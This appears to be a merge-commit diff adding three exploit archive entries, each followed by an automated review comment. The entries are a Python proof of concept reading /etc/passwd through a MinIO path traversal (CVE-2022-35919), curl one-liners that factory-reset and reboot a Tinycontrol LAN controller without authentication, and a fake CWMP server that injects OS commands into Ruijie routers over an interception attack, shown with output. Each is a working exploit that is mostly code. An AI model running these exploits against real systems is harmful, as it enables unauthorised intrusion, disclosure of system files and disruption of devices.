Merge remote-tracking branch 'upstream/main'
Showing
24 changed files
with
2,075 additions
and
5 deletions.
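--- /dev/null
+++ b/<file path not shown on page>
@@ -0,0 +1,81 @@
+# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal
+# Date: 2023-09-02
+# Exploit Author: Jenson Zhao
+# Vendor Homepage: https://min.io/
+# Software Link: https://github.com/minio/minio/
+# Version: Up to (excluding) 2022-07-29T19-40-48Z
+# Tested on: Windows 10
+# CVE : CVE-2022-35919
+# Required before execution: pip install minio,requests
+import urllib.parse
+import requests, json, re, datetime, argparse
+from minio.credentials import Credentials
+from minio.signer import sign_v4_s3
+
+
+class MyMinio():
+secure = False
+
+def __init__(self, base_url, access_key, secret_key):
+self.credits = Credentials(
+access_key=access_key,
+secret_key=secret_key
+)
+if base_url.startswith('http://') and base_url.endswith('/'):
+self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
+elif base_url.startswith('https://') and base_url.endswith('/'):
+self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
+self.secure = True
+else:
+print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')
+
+def poc(self):
+datetimes = datetime.datetime.utcnow()
+datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
+urls = urllib.parse.urlparse(self.url)
+headers = {
+'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
+'X-Amz-Date': datetime_str,
+'Host': urls.netloc,
+}
+headers = sign_v4_s3(
+method='POST',
+url=urls,
+region='',
+headers=headers,
+credentials=self.credits,
+content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
+date=datetimes,
+)
+if self.secure:
+response = requests.post(url=self.url, headers=headers, verify=False)
+else:
+response = requests.post(url=self.url, headers=headers)
+try:
+message = json.loads(response.text)['Message']
+pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'
+matches = re.findall(pattern, message)
+if matches:
+print('There is CVE-2022-35919 problem with the url!')
+print('The contents of the /etc/passwd file are as follows:')
+for match in matches:
+print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],
+match[6]))
+else:
+print('There is no CVE-2022-35919 problem with the url!')
+print('Here is the response message content:')
+print(message)
+except Exception as e:
+print(
+'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')
+print(response.text)
+
+
+if __name__ == '__main__':
+parser = argparse.ArgumentParser()
+parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")
+parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
+parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
+args = parser.parse_args()
+minio = MyMinio(args.url, args.accesskey, args.secretkey)
+minio.poc()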
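Review bot: In `__init__`, the `else` branch only prints a message and leaves `self.url` unset, so `poc()` later dies with an `AttributeError` on `self.url` instead of a clear error; abort there instead, e.g. `raise SystemExit('Please enter a URL address that starts with "http://" or "https://" and ends with "/"')`. The `except Exception as e` in `poc()` binds `e` without using it and folds every failure into one generic message; the `requests.post` call is already outside the `try`, so `except (ValueError, KeyError):` covers the JSON/`'Message'` cases the handler is actually written for and lets anything else surface. `datetime.datetime.utcnow()` is deprecated from Python 3.12; `datetime.datetime.now(datetime.timezone.utc)` gives the same `%Y%m%dT%H%M%SZ` string. For readers, the header says the check is authenticated (it needs a valid access/secret key pair) and that the fix ships in 2022-07-29T19-40-48Z; on the server side, `POST /minio/admin/v3/update` requests whose `updateURL` is a filesystem path rather than an update URL are the thing to log and alert on.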
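--- /dev/null
+++ b/<file path not shown on page>
@@ -0,0 +1,47 @@
+Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service
+Exploit Author: LiquidWorm
+
+Vendor: Tinycontrol
+Product web page: https://www.tinycontrol.pl
+Affected version: <=1.58a, HW 3.8
+
+Summary: Lan Controller is a very universal
+device that allows you to connect many different
+sensors and remotely view their readings and
+remotely control various types of outputs.
+It is also possible to combine both functions
+into an automatic if -> this with a calendar
+when -> then. The device provides a user interface
+in the form of a web page. The website presents
+readings of various types of sensors: temperature,
+humidity, pressure, voltage, current. It also
+allows you to configure the device, incl. event
+setting and controlling up to 10 outputs. Thanks
+to the support of many protocols, it is possible
+to operate from smartphones, collect and observ
+the results on the server, as well as cooperation
+with other I/O systems based on TCP/IP and Modbus.
+
+Desc: The controller suffers from an unauthenticated
+remote denial of service vulnerability. An attacker
+can issue direct requests to the stm.cgi page to
+reboot and also reset factory settings on the device.
+
+Tested on: lwIP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+
+
+Advisory ID: ZSL-2023-5785
+Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php
+
+
+18.08.2023
+
+--
+
+
+$ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings
+$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1 # reboot controller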
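Review bot: The advisory states the affected version (`<=1.58a, HW 3.8`) but records no fixed version, vendor response or workaround, so a reader cannot tell whether a patch exists; a line such as `Fix: <vendor fix version, or "none at time of publication">` after the affected-version line would close that gap. The second `Advisory ID:` line is actually the advisory URL and would read better as `Advisory URL:`. What the two requests demonstrate is a state-changing action (factory reset, reboot) reachable with no authentication on a plain GET; the remediation is to put those endpoints behind authentication and a non-idempotent method, and until a fixed firmware exists the device's web interface should not be reachable from untrusted networks.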
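--- /dev/null
+++ b/<file path not shown on page>
@@ -0,0 +1,176 @@
+# Exploit Title: Ruijie Reyee Wireless Router firmware version B11P204 - MITM Remote Code Execution (RCE)
+# Date: April 15, 2023
+# Exploit Author: Mochammad Riyan Firmansyah of SecLab Indonesia
+# Vendor Homepage: https://ruijienetworks.com
+# Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204
+# Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400)
+# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
+
+"""
+Summary
+=======
+The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection.
+In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request.
+Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server.
+Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system.
+
+This advisory has also been published at https://github.com/ruzfi/advisory/tree/main/ruijie-wireless-router-mitm-rce.
+"""
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+from html import escape, unescape
+import http.server
+import socketserver
+import io
+import time
+import re
+import argparse
+import gzip
+
+# command payload
+command = "uname -a"
+
+# change this to serve on a different port
+PORT = 8080
+
+def cwmp_inform(soap):
+cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
+product_class = re.search(r"(?:<ProductClass.*?>)(.*?)(?:<\/ProductClass>)", soap).group(1)
+serial_number = re.search(r"(?:<SerialNumber.*?>)(.*?)(?:<\/SerialNumber>)", soap).group(1)
+result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}}
+parameters = re.findall(r"(?:<P>)(.*?)(?:<\/P>)", soap)
+for parameter in parameters:
+parameter_name = re.search(r"(?:<N>)(.*?)(?:<\/N>)", parameter).group(1)
+parameter_value = re.search(r"(?:<V>)(.*?)(?:<\/V>)", parameter).group(1)
+result['parameters'][parameter_name] = parameter_value
+return result
+
+def cwmp_inform_response():
+return """<?xml version='1.0' encoding='UTF-8'?>
+<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">16</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:InformResponse><MaxEnvelopes>1</MaxEnvelopes></cwmp:InformResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""
+
+def command_payload(command):
+current_time = time.time()
+result = """<?xml version='1.0' encoding='UTF-8'?>
+<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand><Mode>config</Mode><CommandList SOAP-ENC:arrayType="xsd:string[1]"><Command>{command}</Command></CommandList></cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(cur_time=current_time, command=command)
+return result
+
+def command_response(soap):
+cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
+command = re.search(r"(?:<Command>)(.*?)(?:<\/Command>)", soap).group(1)
+response = re.search(r"(?:<Response>)((\n|.)*?)(?:<\/Response>)", soap).group(1)
+result = {'cwmp_id': cwmp_id, 'command': command, 'response': response}
+return result
+
+class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
+protocol_version = 'HTTP/1.1'
+def do_GET(self):
+self.send_response(204)
+self.end_headers()
+
+def do_POST(self):
+print("[*] Got hit by", self.client_address)
+
+f = io.BytesIO()
+if 'service' in self.path:
+stage, info = self.parse_stage()
+if stage == "cwmp_inform":
+self.send_response(200)
+print("[!] Got Device information", self.client_address)
+print("[*] Product Class:", info['product_class'])
+print("[*] Serial Number:", info['serial_number'])
+print("[*] MAC Address:", info['parameters']['mac'])
+print("[*] STUN Client IP:", info['parameters']['stunclientip'])
+payload = bytes(cwmp_inform_response(), 'utf-8')
+f.write(payload)
+self.send_header("Content-Length", str(f.tell()))
+elif stage == "command_request":
+self.send_response(200)
+self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly")
+print("[*] Device interacting", self.client_address)
+print(info)
+payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8')
+f.write(payload)
+self.send_header("Content-Length", str(f.tell()))
+else:
+print("[*] Command response", self.client_address)
+print(unescape(info['response']))
+self.send_response(204)
+f.write(b"")
+else:
+print("[x] Received invalid request", self.client_address)
+self.send_response(204)
+f.write(b"")
+
+f.seek(0)
+self.send_header("Connection", "keep-alive")
+self.send_header("Content-type", "text/xml;charset=utf-8")
+self.end_headers()
+if f:
+self.copyfile(f, self.wfile)
+f.close()
+
+def parse_stage(self):
+content_length = int(self.headers['Content-Length'])
+post_data = gzip.decompress(self.rfile.read(content_length))
+if "cwmp:Inform" in post_data.decode("utf-8"):
+return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8")))
+elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"):
+return ("command_response", command_response(post_data.decode("utf-8")))
+else:
+return ("command_request", "Ping!")
+
+def log_message(self, format, *args):
+return
+
+if __name__ == '__main__':
+parser = argparse.ArgumentParser()
+parser.add_argument('--bind', '-b', default='', metavar='ADDRESS',
+help='Specify alternate bind address '
+'[default: all interfaces]')
+parser.add_argument('port', action='store',
+default=PORT, type=int,
+nargs='?',
+help='Specify alternate port [default: {}]'.format(PORT))
+args = parser.parse_args()
+
+Handler = CustomHTTPRequestHandler
+with socketserver.TCPServer((args.bind, args.port), Handler) as httpd:
+ip_addr = args.bind if args.bind != '' else '0.0.0.0'
+print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port))
+try:
+httpd.serve_forever()
+except KeyboardInterrupt:
+pass
+httpd.server_close()
+
+
+"""
+Output
+======
+ubuntu:~$ python3 exploit.py
+[!] serving fake CWMP server at 0.0.0.0:8080
+[*] Got hit by ('[redacted]', [redacted])
+[!] Got Device information ('[redacted]', [redacted])
+[*] Product Class: EW1200G-PRO
+[*] Serial Number: [redacted]
+[*] MAC Address: [redacted]
+[*] STUN Client IP: [redacted]:[redacted]
+[*] Got hit by ('[redacted]', [redacted])
+[*] Device interacting ('[redacted]', [redacted])
+Ping!
+[*] Got hit by ('[redacted]', [redacted])
+[*] Command response ('[redacted]', [redacted])
+PING 127.0.0.1 (127.0.0.1): 56 data bytes
+64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms
+64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms
+64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms
+64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms
+
+--- 127.0.0.1 ping statistics ---
+4 packets transmitted, 4 packets received, 0% packet loss
+round-trip min/avg/max = 0.300/0.335/0.400 ms
+Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux
+
+"""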